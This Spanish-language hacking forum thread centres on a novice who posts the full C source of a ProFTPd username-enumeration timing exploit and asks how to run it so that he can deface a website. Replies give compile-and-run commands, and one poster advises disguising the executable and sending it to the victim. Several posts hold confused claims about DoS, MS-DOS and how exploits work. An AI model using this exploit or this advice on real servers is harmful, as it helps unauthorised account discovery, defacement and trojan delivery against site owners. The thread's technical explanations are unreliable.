Ya copile el exploit, ahora que????

[you_know]

Bueno ya copile el exploit y ahora ke ago? e leido en todo el foro y no encuentro nada! me e leido el manual de copilacion de ozx y solo aprendi a copilarlo pero despues ke lo copilo ke sigue??

miren este fue el exploit ke copile! lo sake de securitifocus

Código:

// ProFTPd remote users discovery based on code execution time - POC exploit
// Coded by Leon Juranic // http://www.lss.hr

#include <sys/socket.h>
#include <sys/types.h>
#include <stdio.h>
#include <arpa/inet.h>
#include <sys/time.h>

#define PORT 21
#define PROBE 8

main (int argc, char **argv)
{
  int sock,n,y;
  long dist,stat=0;
  struct sockaddr_in sin;
  char buf[1024], buf2[1024];
  struct timeval tv, tv2;
  struct timezone tz, tz2;

  printf ("Proftpd remote users discovery exploit\n"
          " Coded by Leon / LSS Security\n"
          ">-------------------------------------<\n");

  if (argc != 3) { printf ("usage: %s ",argv[0]); exit(0); }
 
  sock = socket (AF_INET, SOCK_STREAM, 0);
  sin.sin_family = AF_INET;
  sin.sin_port = htons (PORT);
  sin.sin_addr.s_addr = inet_addr (argv[1]);
  bzero (sin.sin_zero,8);

  connect (sock, (struct sockaddr*)&sin, sizeof(struct sockaddr));

  printf ("Login time: ");
  n = read (sock,buf2, sizeof(buf2));
  for (y=0;y<PROBE;y++) {
     gettimeofday (&tv,&tz);
     snprintf (buf, sizeof(buf)-1,"USER %s\r\n",argv[2]);
     write (sock, buf, strlen(buf));
     n = read (sock,buf2, sizeof(buf2));
     gettimeofday (&tv2,&tz2);
     dist =tv2.tv_usec - tv.tv_usec;
     stat += dist;
     printf (" %d |",dist);
  }
  printf ("\nAvrg: %d\n",(stat/PROBE));
  close (sock);
}

Cualkier ayuda me caeria bien!

[N0Z3LF]

ProFTPd remote users discovery based on code execution time

creo que eso lo explica o no?

[you_know]

ya copile el exploit lo ke kiero es Usarlo! ocea ke sigue ya lo copile ahora ke?

[OzX]

leer bien el manual y no hacer cosas q no tienes mucha la idea...

el compilar que creas? un exe.. este exe tiene que ser executado.
ve bien el manual.

[you_know]

el manual lo e leido 5 veces! y si cree un exe pero como lo ejecuto?
dos click?
dime! plisss

[codebreak]

el manual lo e leido 5 veces! y si cree un exe pero como lo ejecuto?
dos click?
dime! plisss

Para que quieres ejecutar un exploit y abusar de algún bug, si ni siquiera tienes un conocimiento básico de DOS.

Mejor aprende lo básico antes de tirarte a abusar bugs...
Para que lo quieres aprovechar... en el mejor de los casos te devuelve una shell root... y si no sabes DOS, como piensas sacarle algún provecho.

No seas flojo y lee.

Saludos,

[you_know]

en teoria me sujieres ke aprenda ke es dos??

pero pasame un link por ke google silo abla de el ms-dos de windows

[Netstat]

Bueno, lo que yo entendí en el manual de OzX es que ya estando en la carpeta (esto lo sace del manual)
ya estando en la carpeta

C:\cygwin\bin\gcc exploit.c -o exploit.exe

C:\cygwin\bin\exploit (será ejecutado en la consola)

Y te saldrá las opciones del exploit. Si estoy mal porfa ubicenme yo eso entendí.

[codebreak]

en teoria me sujieres ke aprenda ke es dos??

pero pasame un link por ke google silo abla de el ms-dos de windows

No seas flojo.
Para la próxima busca bien e informate solo. MS-DOS es la versión de DOS utilizada por microsoft en Windows....

Donde encuentras manuales de aquello?.
En este foro...

Te reto a encontrar el enlace.

Saludos,

PS: Si no te ayudas solo, como piensas que los demas van a querer...

[you_know]

No seas flojo.
Para la próxima busca bien e informate solo. MS-DOS es la versión de DOS utilizada por microsoft en Windows....

Donde encuentras manuales de aquello?.
En este foro...

Te reto a encontrar el enlace.

Saludos,

Tedigo ke no encuentro nada! solo me habla de microsoft dse cuando inicio bla,bla,bla... yo kiero ke me des el link de la presisa informacion ke devo saver de "DoS" para hacer mi primer deface con Exploit_!

PS: Si no te ayudas solo, como piensas que los demas van a querer...

[you_know]

DoS / Denegación de servicios: Es un ataque, causado en ocasiones por los virus, que evita al usuario la utilización de ciertos servicios (del sistema operativo, de servidores Web, etc).



Eso es dos no???

[OzX]

si.
pero code se referia a MSDOS.

[you_know]

Ozx no se si me doy a explicar!

lo ke kiero es saver presisamente lo ke me falta! ocea kiero saver ke es lo ke tengo ke aprender para poder seguir asia delante.

[OzX]

primeramente saber en k lenguaje esta dicho exploiits o en general e intentar aprender sonbre este lenguaje.. con eso lo demas ya vendra solo

[you_know]

ok estoi aprendiendo C.!

[Celcius]

Bueno si.........

Si lees el manual,notaras que el .exe deberas camuflajearlo. . para luego enviarlo.

pero debes leer el manual,y aprender ALGO DE MS-DOS.

No es tan dificil

[OzX]

un excelente comienzo ojala todos se animen a lo mismo

[flasher]

yo no lo entiendo muy bien, perdonad mi ignorancia.
Si el exploit se compila a raiz de encontrar las bulneravilidad es de un sistema, ¿hay que enviarlo a ese sistema? yo pensaba que se ejecutaba desde el equipo atacante, si no, un exploit viene a ser un troyano pero especifico para un equipo, no?
gracias.

[you_know]

yo no lo entiendo muy bien, perdonad mi ignorancia.
Si el exploit se compila a raiz de encontrar las bulneravilidad es de un sistema, ¿hay que enviarlo a ese sistema? yo pensaba que se ejecutaba desde el equipo atacante, si no, un exploit viene a ser un troyano pero especifico para un equipo, no?
gracias.

Te recomiendo ke hagas lo ke estoi haciendo!

1rº- leete un manual de Ms-DoS (en google hay miles!!)

2dº- Aprender el lewnguaje en ke esta el exploit (toi aprendiendo C casi todos son en C!)

[flasher]

hola,
agradezco tu respuesta y eso es lo que haré, pero ¿podrías decirme si estoy en lo cierto?¿el exploit tiene que ser ejecutado en el equipo victima?
gracias

[OzX]

hola,
agradezco tu respuesta y eso es lo que haré, pero ¿podrías decirme si estoy en lo cierto?¿el exploit tiene que ser ejecutado en el equipo victima?
gracias

depende si es un exploit locao o remoto.

[meilyn]

Me van a disculpar pero me suscribí a esta página para ver si ustedes prestan la ayuda correspondient e y por lo que leo solo tratan de fastidiar a los usuarios y no prestan ninguna ayuda

[abdelali]

Cuando se copila un exploit se va a Donde esta el Exe con Cmd luego se escribe exploit en la cosola y se ejecuta el exploit dandote la informacion que le debes dar para poder entrar en dicho sitio te pedira ej. el path type host etc.